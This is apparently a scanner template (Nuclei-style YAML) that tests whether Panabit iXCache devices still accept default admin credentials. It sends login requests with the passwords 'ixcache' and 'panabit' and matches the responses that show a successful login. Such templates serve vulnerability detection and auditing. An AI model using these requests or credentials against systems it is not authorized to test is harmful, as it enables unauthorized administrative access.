id: poc-yaml-panabit-ixcache-default-password

info:
  name: poc-yaml-panabit-ixcache-default-password
  author: B1anda0(https://github.com/B1anda0)
  severity: high
  tags: xray-converted,ct-159101
  reference:
    - http://forum.panabit.com/thread-10830-1-1.html

http:
  - raw:
      - |
        POST /login/userverify.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password=ixcache

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "URL=/cgi-bin/monitor.cgi"
  - raw:
      - |
        POST /login/userverify.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password=panabit

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "URL=/index.htm"